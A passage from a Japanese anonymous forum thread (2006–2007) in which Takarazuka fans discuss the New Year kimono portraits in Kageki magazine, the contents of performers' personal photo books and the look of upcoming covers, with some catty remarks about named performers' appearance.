きりやんがロケットのお姉さんだったりしないかな〜。

258 :名無しさん@花束いっぱい。:2006/12/26(火) 23:59:44 ID:Q8WtZPn0
月組のまさきって美人なのに
全然かっこよくないね。

259 :名無しさん@花束いっぱい。:2006/12/27(水) 00:13:54 ID:qGDmiJtQ
>257
そう言えば、キリヤンが主演したノバボサ新公でチエはドアボーイ
だったね。
ビデオにアップで映っている。

260 :名無しさん@花束いっぱい。:2006/12/27(水) 00:19:54 ID:HXA4tKOt
>259
でもテロップ間違ってるよね。夏目凛じゃあないな…

261 :名無しさん@花束いっぱい。:2006/12/27(水) 00:28:36 ID:mWw+HWrN
夏芽ね。レオンは代役だったからね〜
レオンーきりやんはありかもね。
グラフのレオンの扮装もノバだったしそのあたり話題にできそう。

262 :名無しさん@花束いっぱい。:2006/12/27(水) 00:55:04 ID:QH16XdVc
>207
澪乃さん退団しちゃったけど出るだろうか・・・

263 :名無しさん@花束いっぱい。:2006/12/27(水) 01:09:00 ID:CzpE+SwP
ゆみこ可愛いジャマイカ!
この人、絶対素のほうがいいわ
タカラヅカの男役としては華もないし綺麗でもなくて色気も無いんだけど
もういい歳なのに、素だとオトコノコっていうか
カッコイイっていうよりなんかカワイイと思ってしまふ







264 :名無しさん@花束いっぱい。:2006/12/27(水) 02:44:04 ID:Pwn6HKhK
娘役本ガセに決まってんじゃん。
メンバー見て一瞬で嘘だって分かったよ。
踊らされたらダメだお。

265 :名無しさん@花束いっぱい。:2006/12/27(水) 07:48:15 ID:KiqGYG4H
1

266 :名無しさん@花束いっぱい。:2006/12/27(水) 11:08:48 ID:KiqGYG4H
かすがのハマってる韓流って何?

267 :名無しさん@花束いっぱい。:2006/12/27(水) 14:25:46 ID:TJ4/21DE
>257
あ〜やっぱりあれってレオン?テロップ違うしこんなに似てる人いるんだ。って思ってた・・

268 :名無しさん@花束いっぱい。:2006/12/28(木) 13:38:50 ID:6SLnQhIw
1月号歌劇がもう届いた。


269 :名無しさん@花束いっぱい。:2006/12/28(木) 13:42:49 ID:vf7S9Ya/
感想&次号予告プリーズ。

270 :名無しさん@花束いっぱい。:2006/12/28(木) 13:46:08 ID:6SLnQhIw
2月号表紙はかしちゃん。(サヨナラ特集号)
えと文は 彩音、彩乃、彩那、彩海、七帆・・・
すごいね彩が4人だ(笑)

271 :名無しさん@花束いっぱい。:2006/12/28(木) 14:49:20 ID:Xt1CUmf5
ポートの感想が知りたいっす。

272 :名無しさん@花束いっぱい。:2006/12/28(木) 16:49:12 ID:a8p88mxu
キムかわいい
るいるいとかなみん同じポーズ
ミズはやはりベルトが…

273 :名無しさん@花束いっぱい。:2006/12/28(木) 16:55:12 ID:RngpRIjr
振袖ポートの人を教えてください!(●▽●)(←とりわけ知りたい)

274 :名無しさん@花束いっぱい。:2006/12/28(木) 17:00:21 ID:a8p88mxu
振袖
となみ、るいるい、かなみん、彩音、あすか、未涼、きむ

はかま
北翔、悠未、愛音、らんとむ、えりたん、キリヤン、立樹、、かしげ


275 :名無しさん@花束いっぱい。:2006/12/28(木) 17:14:02 ID:RngpRIjr
ありがとうございます!
タニちゃんの振袖はもう見られないのかな…しょぼn…

276 :名無しさん@花束いっぱい。:2006/12/28(木) 17:25:20 ID:BEjZxtn1
え、例年こんなにハカマって多かったっけ。
楽しみだけど。

277 :名無しさん@花束いっぱい。:2006/12/28(木) 21:46:35 ID:0O2x5tkL
届くの早っ。
我慢できなくて定期購読にしたのに。


278 :名無しさん@花束いっぱい。:2006/12/28(木) 22:09:32 ID:FotewThT
とむえりの面白振袖ポートは無しか…

279 :名無しさん@花束いっぱい。:2006/12/28(木) 22:18:14 ID:CLmZIAYx
>278
面白認定っすか!w

280 :名無しさん@花束いっぱい。:2006/12/28(木) 22:26:08 ID:kVi7NSLU
87期の相次ぐ退団で同期紹介予想メンツも変わってきたねぇ…
コマ、杏は確定として
確実なのが
龍、かおり、ちぎ、たっちん
予備軍が
さあや、ちあき、ふじこ、ともみん
可能性あり
とーやん、まりい、コロ
このあたりかな?

281 :名無しさん@花束いっぱい。:2006/12/28(木) 22:26:53 ID:0xTiPC5r
もう届いた人いるのー?!裏山

282 :名無しさん@花束いっぱい。:2006/12/28(木) 23:11:25 ID:DdmF0339
トップ娘役がえと文ってことあるの!?

283 :名無しさん@花束いっぱい。:2006/12/28(木) 23:14:23 ID:7BQ7Mt5J
あるよー、最近?だとまーちゃんとかくらりんもやってた。



284 :名無しさん@花束いっぱい。:2006/12/28(木) 23:16:52 ID:SG4gy1hD
ごく普通にあるよ。
みどりちゃんや檀ちゃん、えみくらちゃんもあったと思うし、
グンちゃんとゆりちゃんが揃って書いてたときもあった。
あのお花様ですら書いてたし。

285 :名無しさん@花束いっぱい。:2006/12/29(金) 01:34:29 ID:S6BlZQmw
>>270見事に彩ばかりw
宙にゆっちゃんが出れば完璧w

286 :名無しさん@花束いっぱい。:2006/12/29(金) 16:15:57 ID:6KaKb1Ei
かなみってスタイル悪いなぁ。いつもお決まりの腕を
浮かせて細くみせるポーズするが痛々しい。
となみやうめやあやねは背中がのびていてきれいなのに。
かなみは腕と足が短くてお尻が後ろに出ているし大きすぎ。
猫背だし。娘1ならスタイルよくする努力をするべき。
田舎くさい。

287 :名無しさん@花束いっぱい。:2006/12/29(金) 16:38:05 ID:bQSbrDos
>>286
あれでも相当な努力はしてるんだよ。
でも典型的な昔の日本人体型だからいくら痩せても
これ以上スタイルは良くならないよ。素の骨格の所為なのか・・・
頭が大き過ぎるのも難点。(顔は横幅もあるが、何気に縦にも長い)
せめて首だけでも長ければ良かったのにね。
横に居るのが小顔の麻子だから大顔が目立って気の毒だ。



288 :名無しさん@花束いっぱい。:2006/12/29(金) 16:44:13 ID:O2Bd1xQX
歌劇表紙:理事…老けたと思わざるをえない…
中のポートはそうでもないのに

289 :名無しさん@花束いっぱい。:2006/12/29(金) 16:49:23 ID:SefPQcy5
既出だったらスマソ。
次のPBは蘭寿だそーでつ。

290 :名無しさん@花束いっぱい。:2006/12/29(金) 17:38:16 ID:RrvgCDkk
>>289
おお!d。
ユミコ→らんとむ→まとぶ→キム→ちえ
でいいのかな

291 :名無しさん@花束いっぱい。:2006/12/29(金) 18:19:17 ID:WFyMPFdd
雪のえと文・・・
原稿用紙を字で埋めればいいってもんじゃないだろうorz
編集のお姉さん、ダメ出ししてくれよ。

292 :名無しさん@花束いっぱい。:2006/12/29(金) 18:21:49 ID:O2Bd1xQX
>291
私は冴輝ちはやの絵で満足したから中身読んでなかった
正味は字数の半分だな

293 :名無しさん@花束いっぱい。:2006/12/29(金) 19:23:46 ID:5xxjUMR7
娘1の振袖かわいーーーーー!!

294 :名無しさん@花束いっぱい。:2006/12/29(金) 20:13:21 ID:Z3Sw6JK+
♪まだかな、まだかな〜

295 :名無しさん@花束いっぱい。:2006/12/29(金) 21:00:21 ID:LdeBmKwa
♪学研のおばさん、まだかな〜

296 :名無しさん@花束いっぱい。:2006/12/29(金) 21:19:04 ID:Z3Sw6JK+
>295
ありがとう!
やっぱり学研であってたのね。


297 :名無しさん@花束いっぱい。:2006/12/30(土) 11:53:26 ID:n5EVRVv1
♪マナカナ、マナカナ〜

298 :名無しさん@花束いっぱい。:2006/12/30(土) 13:13:12 ID:DR9bWBD9
宙七帆の文はなかなか読み応えあり。
来月号の宴会レポ楽しみ。
接待代、おうの(アリス)17万、お蝶(まさみ)1万7千にうけた。
車を逆走運転するいりす・・・あなたはやはり十輝星の人なのね。七を家まで送るとは微笑ましい。

299 :名無しさん@花束いっぱい。:2006/12/30(土) 16:01:02 ID:nvimD26a
もう皆届いてるの〜まだだ・・

300 :名無しさん@花束いっぱい。:2006/12/30(土) 16:52:20 ID:tCd1ieUr
私もまだ来ない。
場所とか関係あるのかな。
ENAKで彩吹さんのPBに百花さんが出てるってあったけど、これから出るPBでもそういうのあるのかな。
前のPBでは誰が出てたのか知ってたら教えて!
特に最初の。調べ方が悪いのか全然わからなかった。
長文ごめんなさい。

301 :名無しさん@花束いっぱい。:2006/12/30(土) 18:01:45 ID:06DIXsHp
>300
PB第一弾。持ってる人のだけね。
しかし扮装写真はゆみこの百花との写真とはちょっと趣が違うけど・・・。

水>陽色萌(扮装写真)
大和>美羽あさひ(扮装写真)
瀬奈>彩乃かなみ・檀れい(檀は扮装写真)
大空>陽月華・山科愛(山科は扮装写真)

皆若かったのう・・・

302 :300:2006/12/30(土) 18:10:51 ID:tCd1ieUr
>301さん
ありがとうございます!
もっと早く宝塚に出会ってればよかった。


303 :名無しさん@花束いっぱい。:2006/12/30(土) 19:39:03 ID:6gxPLRuo
>300タン
朝海>晴華みどり(扮装)
春野>白羽ゆり(扮装)・愛田芽久

304 :名無しさん@花束いっぱい。:2006/12/30(土) 20:17:29 ID:tCd1ieUr
>303さんも
ありがとうございます!
コムさんのはかおりちゃんだったんですか…。
やっぱりもっと早く知ってればよかった。


305 :名無しさん@花束いっぱい。:2006/12/30(土) 20:25:33 ID:tCd1ieUr
連投スミマセン。
それにしても、不思議な組み合わせですね。
コムさんとかおりちゃんは同じ雪組、あさこさんと檀ちゃんは同期ですけど、他は違いますよね。
今でも手に入るの買っちゃおうかな。


306 :名無しさん@花束いっぱい。:2006/12/30(土) 20:41:30 ID:vitZLo2r
もひとつ追加!
霧矢>瀧川末子(手足&後姿のみw)・千咲毬愛(扮装)

307 :名無しさん@花束いっぱい。:2006/12/30(土) 21:27:07 ID:Qw6KwWwA
便乗

ほんと。ゆうひシナ、おさとなみ、たにまさみ(タニってまだ月時代だよね?)とか
なに繋がりだか全然わかんない…
本人が呼ぶんじゃないのかな?

308 :名無しさん@花束いっぱい。:2006/12/30(土) 21:34:50 ID:tCd1ieUr
>306さんも
ありがとうございます!
末子はんが激しく気になる〜。

>307さん
お見合いってやつでしょうかね。


309 :名無しさん@花束いっぱい。:2006/12/30(土) 22:05:24 ID:2rBmIeXg
とうこは椎名葵ちゃん。

310 :名無しさん@花束いっぱい。:2006/12/30(土) 23:05:33 ID:6DvLqJcR
接点がなさすぎる人が多いなぁ。
辞めちゃった人も・・・(´・ω・`)

311 :名無しさん@花束いっぱい。:2006/12/30(土) 23:11:08 ID:Y/tkMtvR
歌劇届いた〜♪
るいちゃん→ちょっとぶりっこすぎ?
とうこ→カコイイ!が、やはり体に対して顔がでかい
あやねちゃん→可愛い!ピンクがよく似合う。
この見開きのコンビで何か観てみたい。
えりたん→変
あひ→個人的にベストショット!めちゃくちゃかっこいい。
とよこ→すごすぎwどこで買ってくるのw
まっつ→普通に女の子として可愛い!
奥目→やはり正月ポートは早かったのでは…一人浮いてる

余談だが宙組楽屋取材の公家の男が衝撃的だった…

312 :名無しさん@花束いっぱい。:2006/12/30(土) 23:21:52 ID:PkSI56Ou
もりえ一人だけ奥目呼びかよw

313 :名無しさん@花束いっぱい。:2006/12/31(日) 00:23:20 ID:dUZpWh1R
えりたん→変
一言かよW

314 :名無しさん@花束いっぱい。:2006/12/31(日) 00:55:22 ID:secD/K55
パーソナルブックを全部揃えてる漏れがきますたよ。
パーソナル1
春野→白羽(扮装・円舞曲は白いドレスで)、愛田(デート風景)
朝海→晴華(扮装・ポーの一族)
安蘭→椎名(扮装・オクラホマ!)
瀬奈→檀(扮装・この恋は雲のはてまで)、彩乃(恋人風)
貴城→彩吹(扮装・紫子)
夢輝→沢樹(扮装・愛と青春の旅立ち)
大空→山科(扮装・大江山花伝)、陽月(恋人風)
水→陽色(扮装・WSS)
霧矢→千咲(扮装・ミーマイ)、滝川(恋人風、後ろ姿と足のみ)
大和→美羽(扮装・るろうに剣心)

水はベルナルドとアニタ。あとは主役カップル。
タニは扮装じゃなくてコスプレw
扮装は1ページのみでちほ、みほこ、ウメは複数ページ。
劇団押しの若手と別格が混合してる…

315 :名無しさん@花束いっぱい。:2006/12/31(日) 01:05:00 ID:dHCkaF5O
ねったん(夢輝)は、見開き2pで
あすかとタンゴ踊ってた気がする

316 :名無しさん@花束いっぱい。:2006/12/31(日) 01:12:30 ID:/am8zo3q
うちも歌劇きましたので、ポート感想していいですか?
オサ→支離滅裂
かしちゃん→(つд`)
となみ→貫禄十分
麻子→寒がり
るいちゃん→成人式っぽい
とうこ→緊褌一番
かなみん→そろそろピンクは…
ミズ→フリフリじゃらじゃら
彩音→ひたすら初々しい
あすか→正直、マドンナの方が可愛い
理事→年中無休

以下目についたところ
ゆうひ→ビジュアル系一本
ゆみこ→首から下完璧
えりたん→赤っ!
とよこ→オスカル+それ帯だよね?+足についてるのは銭か?
とむ→むくんだ?
まっつ→佳人薄命
もりえ→考え直せ

317 :名無しさん@花束いっぱい。:2006/12/31(日) 01:14:45 ID:secD/K55
>315
見落とし…ありがとん。
夢輝→遠野(タンゴ、4ページ)

パーソナル2
安蘭→真飛、涼、嶺、大真、綺華、柚希(学ラン姿、昔のヤンキー風)
瀬奈→蘭寿、舞城、霧生、桜(みんなでボーリング)
貴城→城咲(スパニッシュ風ダンスシーン)、山科、舞咲、森咲、花帆、神(アダルティハーレム)
水→華月由舞(アダルティな2ショット、1ページのみ)
霧矢→フィンチ

ゆうひタニはなし。
フィンチはちゃんと「特別出演」の欄に名前がw

ゆみこのパーソナルのももさりは上記あすか、2のあいあいみたいなかんじで
恋人風に絡んで踊ってるショット。
ちなみにマラケシュの測量隊メンバーの若手(みつる、ふみか、りせ、まあ、だいもん)登場の企画もあり。

318 :名無しさん@花束いっぱい。:2006/12/31(日) 07:23:59 ID:Gq7AbAab
スゴいな〜、パーソナルブックのネ申たち!

タニ&まちゃみのるろうに剣心が気になるわ。
アニメ見てたんだよ。
私は左之助と志々雄真実が好きなんだけどね〜
左之助の「嬢ちゃん」と、志々雄真実の「所詮この世は弱肉強食」に惚れたの!
って、スレ違うし。
しかも、昔すぎて記憶曖昧だしっ。
寝るわ。


319 :名無しさん@花束いっぱい。:2006/12/31(日) 09:18:27 ID:H4ARyixd
うんわ
コムエドガーが禿しく見たい。

320 :名無しさん@花束いっぱい。:2006/12/31(日) 10:54:21 ID:iBpHJvOY
やっぱいるんだなぁ〜PBのネ申が!!
もうバックナンバーって買えないのかな。
買ってなかった人のも全部揃えたくなってきたYO!!

321 :名無しさん@花束いっぱい。:2006/12/31(日) 14:48:28 ID:3GwiRReq
過激の発売日って今日?明日?

322 :名無しさん@花束いっぱい。:2006/12/31(日) 14:53:58 ID:CcvB6OGp
12月号には1月4日発売って書いてあるよ。

323 :名無しさん@花束いっぱい。:2006/12/31(日) 15:23:23 ID:3GwiRReq
うわ…まだまだやんorz
有難う。掃除がんがる。

324 :名無しさん@花束いっぱい。:2006/12/31(日) 21:39:07 ID:mQKuXVdH
>>314d!
オクラホマ・・・なんか、爽やかくさい理事のイメージが強くて噴いた(ごめんw)

タニのるろ剣も気になる。

325 :名無しさん@花束いっぱい。:2007/01/01(月) 14:45:03 ID:ta3R2Y7Y
歌劇ポートに題名つけてみた。
オサさん…手編みのマフラーと帽子ありがとね
かしげさん…料亭かしげにようこそ
トナミちゃん…将軍様、ズルは無しですわよ
アサコさん…僕と狩りに行かないかい?
ルイちゃん…きゃっきゃっきゃっ
トウコさん…いざ舞踏会へ参ろうハインリッヒ公爵
カナミちゃん…ちょっと寝不足だけど頑張るっ
水さん…月が光る夜の街に行かないか?
アヤネちゃん…お花見お花見♪姫のお散歩
アスカちゃん…お団子いかがですかぁ〜。ルン。

326 :名無しさん@花束いっぱい。:2007/01/01(月) 16:05:55 ID:WL9Llvus
来月の表紙はかしちゃん?
詳細きぼーん

327 : 【凶】 【1662円】 :2007/01/01(月) 17:25:39 ID:SlwZkJ8Q
>325
あさこさんとミズさんの誘いは喜んでついてく!
とうこさんのハインリッヒ公爵が激しく気になる〜。
もうっ、早く見たいよ!
何で来ないのよ…

328 :名無しさん@花束いっぱい。:2007/01/03(水) 15:22:29 ID:nuMBMyp+
>>325ハインリッヒ公爵って・・・?

329 :名無しさん@花束いっぱい。:2007/01/03(水) 23:44:42 ID:rmspGUWI
あっ!えと、ハインリッヒ公爵は、トウコさんの服装とか雰囲気から、視線とさしのべた手の先にハインリッヒ公爵(イメージ)みたいな人がいそうって事なんです。
わかり辛い表現で失礼しちゃいました。

330 :名無しさん@花束いっぱい。:2007/01/04(木) 12:28:28 ID:eWOu6qZQ
秘技!ハインリッヒ公爵上げ!

どんなんや・・・

331 :名無しさん@花束いっぱい。:2007/01/04(木) 16:20:43 ID:tbprwjtC
となみ綺麗すなー。お着物もっと派手色でもよさそう。
彩音嫌いだったけど可愛すなー。
コムに継ぐお洒落さん男1はとうこかな。
あと、ミズお疲れ?ベルトはご立派でしたが…
あさこのコートは堕天使のまゆみさんのコートみたいだ。
もりえゆみこがヒドすorz
おめーら路線だろ!何とかしてくれ!
んで、何でキムはそんなに可愛くきまっちゃうんだ!
まとぶんなんかお着物じゃなくて私服なのに何で可愛くきまっちゃうんだ!
あすかやっぱり太った?幸せ太りかな?マドンナは可愛かった。
雪の絵と文はひどいな…

332 :名無しさん@花束いっぱい。:2007/01/04(木) 19:19:28 ID:lncpZz43
歌劇ポート、
アサコの装いに白くまを、
ミズの装い(ベルトw)に男を、
オサの装いに中居正広を感じた。

333 :名無しさん@花束いっぱい。:2007/01/04(木) 19:48:05 ID:zYKFYC4k
となあすあやね可愛い。
マドンナあすか綺麗。
かしとうあひ格好良い。
水、血色悪い…。
雪組えと分、本当つまらん。

334 :名無しさん@花束いっぱい。:2007/01/04(木) 21:54:44 ID:T1Ztfg5D
宙組のえと文最高に面白かった!
七帆くんの文章が面白いのか、
ロイヤルファミリーが凄過ぎたのか・・・

335 :名無しさん@花束いっぱい。:2007/01/05(金) 00:09:21 ID:AQgh+g4s
とうこがおしゃれ・・・?

336 :名無しさん@花束いっぱい。:2007/01/05(金) 00:11:53 ID:XnmJPaWb
2007年の見所は
花:公家顔度
雪:色気とベルト
月:熊三種(白クマ、洗熊、テディベア)
ということで・・・

337 :名無しさん@花束いっぱい。:2007/01/05(金) 01:13:01 ID:wdHMqXnf
>335
いや、6人の中でだよ。
おさはアレだし、あさこもアレだし、ミズはベルトだし。
かしげとタニは、何着ててもあの顔でお洒落さんな気がしてしまうし。
トド様は時代が違う感が漂いまくりだし。

辛うじてとうこ?位。たまに貴子テイスト混じるけど…

338 :名無しさん@花束いっぱい。:2007/01/05(金) 02:45:47 ID:d00hNua+
>337
>ミズはベルトだし。

おっしゃるとおりミズはベルトだがw
センスも良いと思うぞ。

オサとアサコはアレだが
トウコとミズはそれなりのセンスで
カシゲとタニはさらに顔も良い
ってことで・・・

娘トプがみんな可愛くて和むわあ・・
次トプのウメちゃんも可愛いし
ぜひ娘トプ5人+1で写真集を〜!

339 :名無しさん@花束いっぱい。:2007/01/05(金) 11:14:13 ID:p3o00z3c
あひちゃんが一瞬、青木さやかに見えた

340 :名無しさん@花束いっぱい。:2007/01/05(金) 17:17:57 ID:J2092wVX
雪のえと文、誰なんですか?

341 :名無しさん@花束いっぱい。:2007/01/05(金) 17:42:29 ID:J2092wVX
340です。
すいませんわかりましたー。

342 :名無しさん@花束いっぱい。:2007/01/05(金) 19:06:46 ID:s3MZp69D
今日買ってきました〜。
彩音通信は何か、シンプルだけど良いなぁって思った。
かなみんは可愛い。タイトルはもうちょっと良いのがあったような
気もするけど。
はややは良いね〜。タイトルと写真がカッコイイ。
楽屋日記のもゆるちゃんの写真に笑ってしまった。
かわいいというのかなんと言うのか…。

343 :名無しさん@花束いっぱい。:2007/01/05(金) 19:33:41 ID:ixWYoBPF
らんとむ みわっち みっちゃんが三姉妹に見える〜
となみがアダルトだ〜
きりやんが可愛い〜
理事とあひがモデルだ〜
トウコ、すずみん、ダサいかも・・・orz

344 :名無しさん@花束いっぱい。:2007/01/05(金) 22:42:38 ID:t9y/8361
とうこはパンツの裾と、タイみたいな金色のちろっと出てるやつがビミョン

となみとあやねはいいね。
るいるいはあすかと着物変えた方が良かったんでは・・・
そういや4人ほぼ一緒のポーズで、あやねだけ違うのなw

345 :名無しさん@花束いっぱい。:2007/01/05(金) 22:42:55 ID:GF3HgXSI
まっつの袖が短かったら未亡人だなって思ってしまった

すずみんのアレは私服だよね・・・普段からジェローデルファッソンかよ

346 :名無しさん@花束いっぱい。:2007/01/05(金) 22:51:18 ID:dRAv5KOX
>345
お顔が地味なのに服装がジェローデルだから…

347 :名無しさん@花束いっぱい。:2007/01/06(土) 00:52:59 ID:gP9jd1Wb
すずみんだけが地味じゃないんだよ、他も地味・・・
ちょっと前はもっと華やかじゃなかったっけ?
今回比較的華やかで綺麗だと思ったのは
かなみ、あすか、となみ、キム、あひ、理事・・・
あとは普通か地味のどっちか
バックやライトが暗いせいもあるのかな
つうか、カメラマン下手くそ?
正月からどよ〜んな空気が漂っているよ・・・

348 :名無しさん@花束いっぱい。:2007/01/06(土) 00:56:08 ID:YRrfnhdd
>347
そんなあなたに赤面王子をおすすめする

349 :名無しさん@花束いっぱい。:2007/01/06(土) 02:12:43 ID:0DYMPf0+
今年、理事が一番前じゃないな・・・珍しい。
大抵一番目だよね?


350 :名無しさん@花束いっぱい。:2007/01/06(土) 03:02:42 ID:lmIriGcw
>349
つ表紙で一番前

351 :名無しさん@花束いっぱい。:2007/01/06(土) 07:16:47 ID:KLtkQ/Vy
>348
赤面王子って誰?誰?面白いの?おせ〜て〜

352 :名無しさん@花束いっぱい。:2007/01/06(土) 13:24:14 ID:gm5jZ0Xg
毎年思うんだけど、ポートの振袖の背景、何で振袖と同じ色にするのかな?
今年で言うなら彩音やキム。
薄い色合いの振袖なら背景は濃い色の方が栄えると思うんだけど。
薄い色合い+薄い背景だから同化しちゃってる様に感じる。

353 :名無しさん@花束いっぱい。:2007/01/06(土) 13:34:25 ID:RHfIc3zS
>352 同意
それに、娘役のポーズがほとんど同じなのもなぜだろう。
振袖のポーズだと限られてくるのはわかるけど、小道具持たせたりして
ちょっとは変化を付けたらいいのに。

354 :名無しさん@花束いっぱい。:2007/01/06(土) 14:01:47 ID:0DYMPf0+
>>353
というか、振袖でも袴でも、基本的にポーズが似通ってるよね。
何かのカタログを見ているみたいだw

確かに和服のポージングは難しいんだろうけど、
もう少し変化が欲しい。

355 :名無しさん@花束いっぱい。:2007/01/06(土) 14:49:56 ID:3g40g+Ma
ホントだ!振袖も袴もほぼ同じポーズ
確かにこれじゃカタログだよ
着物を持たせるってのも新鮮味ないしなあ
このカメラマン、やる気あるんだろうか?
理事とあひだけ写りが違うので他のカメラマンっぽい

356 :名無しさん@花束いっぱい。:2007/01/06(土) 17:36:23 ID:Wr4J2Mbk
>毎年思うんだけど、ポートの振袖の背景、何で振袖と同じ色にするのかな?

先に撮影した人から背景を選んでいくから、
撮影が後になった人は自然、背景の色を選べなくなってくる(余った色にするしかない)。
だから、着物の色と背景がかぶってしまうことがでてくる。




357 :名無しさん@花束いっぱい。:2007/01/06(土) 18:19:54 ID:UgATsIrW
>353&355
宝塚のポートは基本的にポーズは生徒が勝手につける。
ポーズが重なると困る場合は、上級生から順に撮って
下級生はその上級生が取っていないポーズを考える。

着物のポートは、各組でスケジュールが違う上に皆多忙だから
劇団が上級生順(香板順)に撮って、それ以外のポーズを付けさせるとかしてないからだとオモ。
全部のカラーポートを同じ1人のカメラマンが撮ってるかどうかも不明だから、カメラマンの責任とは一概には言えない。

358 :名無しさん@花束いっぱい。:2007/01/06(土) 18:35:49 ID:7nWCjhCV
彩音通信
なんだか「あやねのあやねによるあやねのためだけの通信」
ってカンジもしたよ・・・

359 :名無しさん@花束いっぱい。:2007/01/06(土) 19:03:13 ID:1gnOPHpw
うん、確かに。
読んでて「あそ」って思って終わった。なんだかなぁ…
雪よりはいいけどさ。

360 :名無しさん@花束いっぱい。:2007/01/06(土) 19:21:17 ID:jF5gkt2K
らんとむの横の花が鬱陶しい。センス悪いよね、カメラマン?

361 :名無しさん@花束いっぱい。:2007/01/06(土) 20:05:47 ID:aWjUWYrQ
らんとむ、口紅のセンスの方がどうかと…

362 :名無しさん@花束いっぱい。:2007/01/06(土) 20:11:08 ID:6NilIxQg
82期はみんな面白い

363 :名無しさん@花束いっぱい。:2007/01/06(土) 20:48:09 ID:40TzK6ns
>358
全員書く必要性は全然無いけど、
目標を聞いた上級生で微妙に抜かされている人が気になる。
(大伴・絵莉・花純・舞城・貴・嶺輝・華桐)
全ツ一緒だったんだし、ちあきさんとひーさんには聞いて欲しかったな…。

364 :名無しさん@花束いっぱい。:2007/01/06(土) 23:55:09 ID:CUJsWn5r
誰がやってもいつもそんなもんだろ
全員のをたらたら書く方が行数ウメって感じでうざいとおも

365 :名無しさん@花束いっぱい。:2007/01/07(日) 00:43:41 ID:chhAn9QI
何年か前、くす玉?みたいなのをふーちゃんか誰かが
手に持っていて、少しポーズを変えていたのを覚えてる。
あの玉はなんて言うんだろう、お花で飾ったり刺繍糸を
巻いてカラフルにしてあるやつ。

366 :名無しさん@花束いっぱい。:2007/01/07(日) 00:47:23 ID:chhAn9QI
あ、すいません、アンカー漏れ。365は着物のポーズの話です…。

367 :名無しさん@花束いっぱい。:2007/01/07(日) 01:06:54 ID:qgXsQB8W
>365
薬玉であってるよ
平安期からお祝いごとで送られたという
あさきゆめみしで知った

368 :セシリィ:2007/01/07(日) 16:17:46 ID:A1jid8DI
美マン・・・

369 :名無しさん@花束いっぱい。:2007/01/07(日) 21:13:26 ID:y2qw5rOO
あやね、たしかに上級生には愛されてそうだけどどうなんだろね。
いつもじゅりあの絵なのに違うし。
でも新鮮でいいけどね〜じゅりあの絵ばっかじゃマンネリだよな

370 :名無しさん@花束いっぱい。:2007/01/07(日) 22:21:51 ID:Lts8+dtk
やっと歌劇買えたよ。
娘1たちの振袖はみんな似合っててかわいい。
かなみととなみはえらくいい振袖着てるね。
好みはるいの振袖定番みたいなのが好きだった。

ゆみこ・・・そんないい着物を下にひきずるだけなんてもったいなさすぎ・・・
せめて肩にかけるか羽織るかしないと
せっかくのいい着物なのに着物も持ち主も泣いちゃうよ・・・

371 :名無しさん@花束いっぱい。:2007/01/08(月) 01:35:37 ID:nAwimxil
370タソの読んで改めて見たら、ゆみこの着物珍しい柄なんだね!
西洋のお人形さん柄!アンティークかな?

372 :名無しさん@花束いっぱい。:2007/01/08(月) 20:19:13 ID:sfB3EKGw
今日は、振袖を着て、正座して、上品に上げてます・・・

373 :名無しさん@花束いっぱい。:2007/01/09(火) 00:00:30 ID:Y/ivc3yF
ガイシュツで見落としてたらゴメソ、グラフ次号表紙。

ttp://b.pic.to/86gfn

かしちゃん綺麗だけど、ちょっとお疲れ気味?

374 :名無しさん@花束いっぱい。:2007/01/09(火) 01:24:34 ID:m3lwIVa8
うーん…綺麗なんだけど…

コムの時と雰囲気似てるね

375 :名無しさん@花束いっぱい。:2007/01/09(火) 03:56:42 ID:HIUdOUcX
>>371
あれは、京都にある紫織庵という呉服屋が出しているものですよ。
そこはアンティーク柄を長襦袢や着物や羽裏などの反物に復刻させているので有名です。
なので、アンティークじゃなく新品です。
私もよく誂えるんですが、とっても可愛いですよ。
ユミコさん、お洒落さんですね。
なんだか嬉しくなりました。

376 :名無しさん@花束いっぱい。:2007/01/09(火) 11:46:18 ID:KpCyTxDa
>373
かしげきれいじゃん。
カバースペシャルも楽しみ

377 :371:2007/01/09(火) 18:15:56 ID:8LkdPlaC
>>375タソありがとう。
そうか変わり柄の新品なのか。面白いね!

378 :名無しさん@花束いっぱい。:2007/01/10(水) 00:47:24 ID:dnWcTHPF
ヤンジェネ本
誰のセンスが好き?

379 :名無しさん@花束いっぱい。:2007/01/10(水) 09:08:28 ID:FqwltluE
ヤンジェネさー、
美弥の目がディファインずれててやばすぎw


380 :名無しさん@花束いっぱい。:2007/01/10(水) 09:10:53 ID:FqwltluE
スマソ‥

381 :名無しさん@花束いっぱい。:2007/01/10(水) 09:11:21 ID:9yuhmOKp
>378、>379
そんな本見たこと無いけどw
ageてるし、どこぞのアンチさん?

382 :名無しさん@花束いっぱい。:2007/01/10(水) 09:25:11 ID:FqwltluE
>>379です
ニュージェネだ、マスマスマソ‥

383 :名無しさん@花束いっぱい。:2007/01/10(水) 09:30:34 ID:9yuhmOKp
>382
おぉ、それならしっちょる。こちらこそ失礼しやした。
美弥って零れそうにでかい人だったよな、確か。
スカステのヘタッピな印象しか無いんだがw

384 :名無しさん@花束いっぱい。:2007/01/10(水) 23:34:55 ID:5ID/GvCS
やっとこさ「歌劇」買った
ここでも話題になってたすずみんそんなに悪くなかったなー
なーんかいかにも「ジェンヌです力入れてます」って姿勢に
好感が持てたんだけど・・・
毎年思うんだけど男役さんの振袖姿になーんか違和感がある
んだよねートップ娘役のは楽しみなんだけど・・・

385 :名無しさん@花束いっぱい。:2007/01/11(木) 00:09:17 ID:hK/JQoe9
次号グラフの表紙綺麗なんだけど…
でもいい方に綺麗なパターンではないな…>かしげ


85 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)